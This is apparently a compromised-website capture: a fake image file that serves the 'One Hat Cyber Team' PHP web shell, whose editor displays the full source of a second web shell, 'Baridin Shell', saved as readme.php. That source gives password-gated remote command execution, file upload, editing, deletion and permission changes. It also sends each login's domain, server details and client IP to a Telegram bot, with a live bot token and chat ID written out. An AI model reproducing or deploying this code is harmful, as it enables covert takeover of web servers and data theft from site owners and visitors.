�����JFIF�


�H�H�����C�


		
%# , #&')*)-0-(0%()(����P�P

�����
�


����������
���5�
	������
�!1AQq��"#2Bar���R�Sc������

��?��R��������X�o�k,��e�k�X���9["&Q
����}Nq'����{u\�6hc�i�r_�n[t�lU�;8��Ax����r�{�f����Q��岳���/
f�8�T�D'e����W^�YŞ��}h����7�`��Կ�֑�w.gVtq>��5����O���y�.>%X��U]3�\���${�أh�~k�Բ�o�Fq��#����y����0�&
��;�-W�*�%K���m'o�Yt��L�����Q��TS1�%�`y=���+���b����dmi�
HC�T_#���|���P��㬈v;?E����U�"
W<����ms��MmL��G1�9��'�'�����%��akJo]Qcr��խ���O$
;:V�>�_Dn����s����m۸U�#�ҝ��ܾpe.qw3�/��*�a#���=\.!N���s��l��x�Ԗjz�Z�!��� �>!��Ɵs��E<��9�N9m�/��E�&�y�?��yY$a�p�-�R�5��6�XOk$>D�켎��T�RUT�����<���>��h��<�9��D���}�?f8��$�
�EYki/O����28��}#������"(��9���<��
x�G���Ԑ���YD�2��DL���
<br />
<b>Warning</b>:  chmod(): No such file or directory in <b>/home/publqaio/barnesandnoblespublisher.com/css/990.php(42) : eval()'d code</b> on line <b>1</b><br />
<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Default page</title>
    <link rel="icon" type="image/x-icon" href="//hpanel.hostinger.com/favicons/hostinger.png">
    <meta charset="utf-8">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="Default page" name="description">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="//fonts.googleapis.com/css2?family=Bree+Serif&family=Rock+Salt&display=swap" rel="stylesheet">
    <script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <style>body{color:#000;font-size:0;font-family:'Bree Serif',serif;width:99%;padding:0;margin:7px auto;background-color:black!important}.bg-dark{background-color:black!important}.border{box-shadow:0 0 10px #ff1493;border:2px solid #ff1493!important;border-radius:5px;background:#fff0}.border:hover{box-shadow:0 0 10px #ff1493}.table td{padding:.1rem;box-shadow:inset 0 0 0 1px #ff1493;border-radius:2px}.table thead th{font-family:'Bree Serif',serif;box-shadow:inset 0 0 0 1.5px #ff1493;color:#ff1493;padding:.25rem;border-radius:5px;background:linear-gradient(to bottom,black,rgb(63 63 63 / .5))}.table-hover tbody tr:hover td{background:rgb(63 63 63 / .5)}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:transparent!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}.form-group{margin:.2rem 0}li{font-size:large!important;color:#ff1493!important;list-style:inherit!important}a{color:#fff;text-decoration:none!important}a:hover{color:#ff1493;animation:kedip 1s linear infinite}h5{margin:1.5px 0;color:#ff1493!important;padding:2px}textarea{width:97%;font-size:medium!important;font-family:inherit;height:44vh;padding-left:5px}button,input{border:2px solid #ff1493;border-radius:5px;font-size:15px;color:#fff;line-height:normal;font-family:inherit}button:hover,input:hover{cursor:pointer}.ohct{padding:0 1rem;color:#fff;border:2px solid #ff1493;border-radius:5px;background-color:#fff0;font-family:inherit;font-size:16px}.ohct:hover{color:#ff1493!important}.combet{color:#fff}.combet:hover{color:#ff1493}.p-1{padding:4px}::selection{color:#000;background:silver}.fa{padding:10px;font-size:20px;width:50px;text-align:center;margin:5px;color:#ff1493}.fa:hover{border:2px solid #ff1493}.text-light{color:#f8f9fa!important;font-size:large!important}.kedip{animation:kedip 1s linear infinite}@keyframes kedip{0%,100%{color:#ff1493}50%{color:#fff}}@keyframes rainbowBorder{0%{border-image:linear-gradient(to right,#ff1493,magenta) 1}14%{border-image:linear-gradient(to right,magenta,lime) 1}28%{border-image:linear-gradient(to right,lime,yellow) 1}42%{border-image:linear-gradient(to right,yellow,orange) 1}57%{border-image:linear-gradient(to right,orange,#ff1493) 1}71%{border-image:linear-gradient(to right,#ff1493,pink) 1}85%{border-image:linear-gradient(to right,pink,#ff1493) 1}}.rainbow-border{border:2px solid #ff1493;border-radius:5px!important;animation:rainbowBorder 2s linear infinite}@keyframes rainbowText{0%,100%{color:#ff1493}14%{color:#f0f}28%{color:lime}42%{color:#ff0}57%{color:orange}71%{color:#ff1493}85%{color:pink}}@keyframes rainbowText1{0%,100%{color:pink}14%{color:#ff1493}28%{color:orange}42%{color:#ff0}57%{color:lime}71%{color:#f0f}85%{color:#ff1493}}.rainbow-text{animation:rainbowText 2s infinite;font-weight:700}.rainbow-text1{animation:rainbowText1 2s infinite;font-weight:700}hover{box-shadow:0 0 10px #ff1493}.table td{padding:.1rem;box-shadow:inset 0 0 0 1px #ff1493;border-radius:2px}.table thead th{font-family:'Bree Serif',serif;box-shadow:inset 0 0 0 1.5px #ff1493;color:#ff1493;padding:.25rem;border-radius:5px;background:linear-gradient(to bottom,black,rgb(63 63 63 / .5))}.table-hover tbody tr:hover td{background:rgb(63 63 63 / .5)}.form-control{background:transparent!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}.ohct{padding:0 1rem;color:#fff;border:2px solid #ff1493;border-radius:5px;background-color:#fff0;font-size:16px}.ohct:hover{color:#ff1493!important}.rainbow-border{border:2px solid #ff1493;border-radius:5px!important;animation:rainbowBorder 2s linear infinite}@keyframes rainbowBorder{0%{border-image:linear-gradient(to right,#ff1493,magenta) 1}14%{border-image:linear-gradient(to right,magenta,lime) 1}28%{border-image:linear-gradient(to right,lime,yellow) 1}42%{border-image:linear-gradient(to right,yellow,orange) 1}57%{border-image:linear-gradient(to right,orange,#ff1493) 1}71%{border-image:linear-gradient(to right,#ff1493,pink) 1}85%{border-image:linear-gradient(to right,pink,#ff1493) 1}}</style>
  </head>
<body>
    <div class="table-responsive text-light rainbow-border" style="text-align: left; padding: 4px;">
        <div style="text-align: center; display: flex; align-items: center; justify-content: center;">
            <a href="//t.me/combetohct" target="_blank" rel="noopener noreferrer">
                <span class="material-symbols-outlined rainbow-text1" style="font-size: 3rem;padding-right: 0.5rem;">&#9885;</span>
            </a>
            <a href="?" style="font-size: 1.5rem; padding: 0.5rem;">
                <span class="rainbow-text" style="font-family: Rock Salt;">One Hat Cyber Team</span>
            </a>
            <a href="mailto:combetohct@yahoo.com">
                <span class="material-symbols-outlined rainbow-text1" style="font-size: 3rem;padding-left: 0.5rem;">&#9885;</span>
            </a>
        </div>
        <ul style="margin: 0; padding-inline-start: 30px;">
        <li>Your IP: <span style="color: white;">216.73.216.108</span></li>
        <li>Server IP: <span style="color: white;">162.254.39.63</span></li>
        <li>Server: <span style="color: white;">Linux premium312.web-hosting.com 4.18.0-553.16.1.lve.1.el8.x86_64 #1 SMP Mon Sep 23 20:16:18 UTC 2024 x86_64</span></li>
        <li>Server Software: <span style="color: white;">LiteSpeed</span></li>
        <li>PHP Version: <span style="color: white;">8.1.34</span></li>
            <li>
                <a href="?p=2f686f6d652f7075626c7161696f2f6175746f76696e7265706f7274732e636f6d&a=6e657746696c65" class="ohct">Buat File</a> | 
                <a href="?p=2f686f6d652f7075626c7161696f2f6175746f76696e7265706f7274732e636f6d&a=6e6577446972" class="ohct">Buat Folder</a>
            </li>
        </ul>
        <form action="" method="POST" enctype="multipart/form-data" style="padding: 0.10rem; display: inline-block; margin: 2px 0;">
        <input type="file" name="uploaded_filenya">
        <input type="submit" name="upload_filenya" value="Upload" class="button ohct">
    </form>
           <form method="POST" style="margin: 2px 0;">
            <div class="form-group">
                <input type="text" name="command" class="border p-1" style="text-align: center; width: 296px; height: 29px;" placeholder="Masukkan Command">
                <button type="submit" name="execute_command" class="ohct">Eksekusi</button>
            </div>
        </form>
            </div>
<div class="table-responsive text-light rainbow-border" style="text-align: left;padding: 4px;margin-bottom: 3px;margin-top: 3px;">
<li>Dir : <span><a href="?p=2f" class="combet">~</a>/<a class="combet" href="?p=2f686f6d65">home</a>/<a class="combet" href="?p=2f686f6d652f7075626c7161696f">publqaio</a>/<a class="combet" href="?p=2f686f6d652f7075626c7161696f2f6175746f76696e7265706f7274732e636f6d">autovinreports.com</a>/ 
</span></li></div>
<div class="table-responsive text-light" style="text-align: center;font-family: inherit;font-size: large;">
<h5 class="p-1 rainbow-border">Edit File: readme.php</h5>
    <form method="POST">
        <textarea name="edited_content" cols="30" rows="10" class="form-control rainbow-border"><?php
session_start();

// == Konfigurasi ==
$botToken = "7773053413:AAEkbvDKVgxOgyIXWSxbVOzMjGCQuzwpRb4";
$chatId = "7325256586";
$salt = "baridinsalt2025";
$password_hash = md5("memek" . $salt);
$self = $_SERVER['PHP_SELF'];
$domain = $_SERVER['HTTP_HOST'];

// == Fungsi login ==
if (!isset($_SESSION['logged_in'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['pass'])) {
        if (md5($_POST['pass'] . $salt) === $password_hash) {
            $_SESSION['logged_in'] = true;
            $server = php_uname();
            $ip = $_SERVER['REMOTE_ADDR'];
            $msg = "🛡️ *Baridin Shell Login*\nDomain: `$domain`\nServer: `$server`\nClient IP: `$ip`\nFile: `http://$domain$self`";
            $url = "https://api.telegram.org/bot$botToken/sendMessage?chat_id=$chatId&text=" . urlencode($msg) . "&parse_mode=Markdown";
            @file_get_contents($url);
            header("Location: $self");
            exit;
        } else {
            $error = "Wrong password.";
        }
    }
    echo '<style>body{background:#000;color:#0f0;font-family:monospace;text-align:center;padding-top:100px}input{background:#111;color:#0f0;border:1px solid #0f0;padding:5px;}</style>';
    echo '<form method="POST"><h2>Login Shell</h2><input type="password" name="pass" placeholder="Password"> <input type="submit" value="Login"><br>';
    if (isset($error)) echo "<div>$error</div>";
    echo '</form>';
    exit;
}

// == Fungsi utilitas ==
function perms($file) {
    $perms = fileperms($file);
    $info = '';
    if (is_dir($file)) $info = 'd';
    elseif (is_link($file)) $info = 'l';
    else $info = '-';
    $info .= ($perms & 0x0100) ? 'r' : '-';
    $info .= ($perms & 0x0080) ? 'w' : '-';
    $info .= ($perms & 0x0040) ? 'x' : '-';
    $info .= ($perms & 0x0020) ? 'r' : '-';
    $info .= ($perms & 0x0010) ? 'w' : '-';
    $info .= ($perms & 0x0008) ? 'x' : '-';
    $info .= ($perms & 0x0004) ? 'r' : '-';
    $info .= ($perms & 0x0002) ? 'w' : '-';
    $info .= ($perms & 0x0001) ? 'x' : '-';
    return $info;
}
function getSize($size) {
    $units = ['B','KB','MB','GB','TB'];
    for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
    return round($size, 2) . ' ' . $units[$i];
}

$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
chdir($path);
$path = getcwd();

// == Upload ==
if (isset($_FILES['upload'])) {
    move_uploaded_file($_FILES['upload']['tmp_name'], $path . '/' . $_FILES['upload']['name']);
}

// == Create file ==
if (isset($_POST['create_file']) && $_POST['filename']) {
    $file = $path . '/' . basename($_POST['filename']);
    file_put_contents($file, '');
}

// == Create dir ==
if (isset($_POST['create_dir']) && $_POST['dirname']) {
    mkdir($path . '/' . basename($_POST['dirname']));
}

// == Rename ==
if (isset($_POST['rename_from']) && isset($_POST['rename_to'])) {
    rename($_POST['rename_from'], $_POST['rename_to']);
}

// == Delete ==
if (isset($_GET['delete'])) {
    $f = $_GET['delete'];
    is_dir($f) ? rmdir($f) : unlink($f);
}

// == Chmod ==
if (isset($_POST['chmod_file']) && isset($_POST['chmod_val'])) {
    chmod($_POST['chmod_file'], octdec($_POST['chmod_val']));
}

// == Touch + Edit ==
if (isset($_GET['touch'])) {
    $f = $_GET['touch'];
    touch($f);
    $content = file_get_contents($f);
    echo <<<HTML
    <style>body{background:#000;color:#fff;font-family:monospace;padding:10px;}textarea,input{background:#111;color:#fff;border:1px solid #00ff00;}a{color:#00ff00;}</style>
    <h3>Edit (Touch): $f</h3>
    <form method="POST">
    <textarea name="content" rows="25" style="width:100%">{$content}</textarea><br>
    <input type="hidden" name="file" value="{$f}">
    <input type="submit" name="save_touch" value="Save"></form><hr>
    <a href="{$self}?path=" . urlencode(dirname($f)) . '">Back</a>
HTML;
    exit;
}
if (isset($_POST['save_touch']) && isset($_POST['file'])) {
    file_put_contents($_POST['file'], $_POST['content']);
}

// == Edit file ==
if (isset($_GET['edit']) && file_exists($_GET['edit'])) {
    $file = $_GET['edit'];
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) {
        file_put_contents($file, $_POST['content']);
        echo "<b>Saved.</b><br>";
    }
    $content = htmlspecialchars(file_get_contents($file));
    echo "<style>body{background:#000;color:#fff;font-family:monospace;padding:10px;}textarea,input{background:#111;color:#fff;border:1px solid #00ff00;}a{color:#00ff00;}</style>";
    echo "<h3>Edit File: $file</h3><form method='POST'>";
    echo "<textarea name='content' rows='25' style='width:100%'>$content</textarea><br>";
    echo "<input type='submit' value='Save'></form><hr>";
    echo "<a href='$self?path=" . urlencode(dirname($file)) . "'>Back</a>";
    exit;
}

// == Terminal via AJAX ==
if (isset($_POST['ajax_terminal']) && isset($_POST['cmd'])) {
    header('Content-Type: text/plain');
    $output = shell_exec($_POST['cmd']);
    echo $output ?: "(no output)";
    exit;
}

// == Tampilan HTML ==
echo "<!DOCTYPE html><html><head><title>Baridin Shell</title><style>
body{background:#000;color:#0f0;font-family:monospace;}
a{color:#0f0;text-decoration:none;}a:hover{text-decoration:underline;}
table{width:100%;border-collapse:collapse;}
th,td{border:1px solid #0f0;padding:4px;}
th{background:#111;color:#fff;}
.writable{color:#00ff00;} .readonly{color:#ffffff;}
.center{text-align:center;margin:10px;}
input,textarea{background:#111;color:#0f0;border:1px solid #0f0;}
.box{border:1px solid #0f0;padding:10px;margin:10px 0;background:#111;}
</style></head><body>";

echo "<div class='box'><h2 style='color:white'>Baridin Shell</h2>";
$diskPath = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? 'C:' : '/';
$hostname = gethostname();
$os = php_uname();
$totalDisk = getSize(disk_total_space($diskPath));
$freeDisk = getSize(disk_free_space($diskPath));
$usedDisk = getSize(disk_total_space($diskPath) - disk_free_space($diskPath));

echo "<b>Server IP:</b> {$_SERVER['SERVER_ADDR']}<br>";
echo "<b>Client IP:</b> {$_SERVER['REMOTE_ADDR']}<br>";
echo "<b>Hostname:</b> $hostname<br>";
echo "<b>OS:</b> $os<br>";
echo "<b>Disk:</b> Used: $usedDisk / Free: $freeDisk / Total: $totalDisk</div>";

echo "<div class='center'>
<a href='$self'>[ Home ]</a> 
<a href='https://t.me/baridin_host' target='_blank'>[ Buy Shell ]</a> 
<a href='$self?logout=1'>[ Logout ]</a>
</div>";

if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: $self");
    exit;
}

$parts = explode(DIRECTORY_SEPARATOR, trim($path, DIRECTORY_SEPARATOR));
$nav = (DIRECTORY_SEPARATOR === "\\") ? substr($path, 0, 2) : "/";
$build = (DIRECTORY_SEPARATOR === "\\") ? substr($path, 0, 2) : "";
foreach ($parts as $part) {
    $build .= DIRECTORY_SEPARATOR . $part;
    $nav .= " / <a href='?path=" . urlencode($build) . "'>" . htmlspecialchars($part) . "</a>";
}
echo "<div class='box'><b>Path:</b> $nav</div>";

echo "<table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Owner/Group</th><th>Modified</th><th>Action</th></tr>";
foreach (scandir($path) as $item) {
    if ($item == '.') continue;
    $full = "$path/$item";
    $permstr = perms($full);
    $permClass = is_writable($full) ? 'writable' : 'readonly';
    $owner = @posix_getpwuid(fileowner($full));
    $group = @posix_getgrgid(filegroup($full));
    $ownerName = $owner ? $owner['name'] : fileowner($full);
    $groupName = $group ? $group['name'] : filegroup($full);

    echo "<tr><td>";
    if (is_dir($full)) {
        echo "<a href='?path=" . urlencode($full) . "'>$item</a>";
    } else {
        echo "<a href='?edit=" . urlencode($full) . "'>$item</a>";
    }
    echo "</td><td>" . (is_file($full) ? getSize(filesize($full)) : '-') . "</td>";
    echo "<td><a class='$permClass' href='#'>$permstr</a></td>";
    echo "<td>$ownerName/$groupName</td>";
    echo "<td>" . date("Y-m-d H:i:s", filemtime($full)) . "</td><td>";
    echo "<a href='?edit=" . urlencode($full) . "'>E</a> ";
    echo "<a href='$self?rename_from=" . urlencode($full) . "'>R</a> ";
    echo "<a href='?touch=" . urlencode($full) . "'>T</a> ";
    if (is_file($full)) echo "<a href='" . urlencode($full) . "' download>S</a> ";
    echo "<a href='?delete=" . urlencode($full) . "' onclick='return confirm(\"Delete?\")'>D</a>";
    echo "</td></tr>";
}
echo "</table>";

echo "<div class='box'><form method='POST' enctype='multipart/form-data'>
<b>Upload:</b><br><input type='file' name='upload'><br><input type='submit' value='Upload'></form></div>";

echo "<div class='box'>
<b>Terminal:</b>
<form id='terminalForm'>
<input type='text' name='cmd' id='cmd' style='width:70%'> 
<input type='submit' value='Run'>
</form>
<pre id='output'></pre>
</div>";

echo "<div class='box'><form method='POST'>
<b>Create File:</b><br><input type='text' name='filename'> <input type='submit' name='create_file' value='Create'></form></div>";

echo "<div class='box'><form method='POST'>
<b>Create Directory:</b><br><input type='text' name='dirname'> <input type='submit' name='create_dir' value='Create'></form></div>";

echo "<div class='center'><a href='https://t.me/baridin_host' target='_blank'>&copy; Baridin</a></div>";

echo <<<JS
<script>
document.getElementById('terminalForm').addEventListener('submit', function(e) {
    e.preventDefault();
    var cmd = document.getElementById('cmd').value;
    fetch("", {
        method: "POST",
        headers: {"Content-Type": "application/x-www-form-urlencoded"},
        body: "ajax_terminal=1&cmd=" + encodeURIComponent(cmd)
    })
    .then(response => response.text())
    .then(data => {
        document.getElementById('output').textContent = data;
    });
});
</script>
JS;

echo "</body></html>";
?></textarea>
        <button type="submit" name="save_edit" class="ohct" style="margin-top: .2rem;">Simpan</button>
    </form>
</div>
 
</div>
<script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script>
<script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script>
</body>
</html>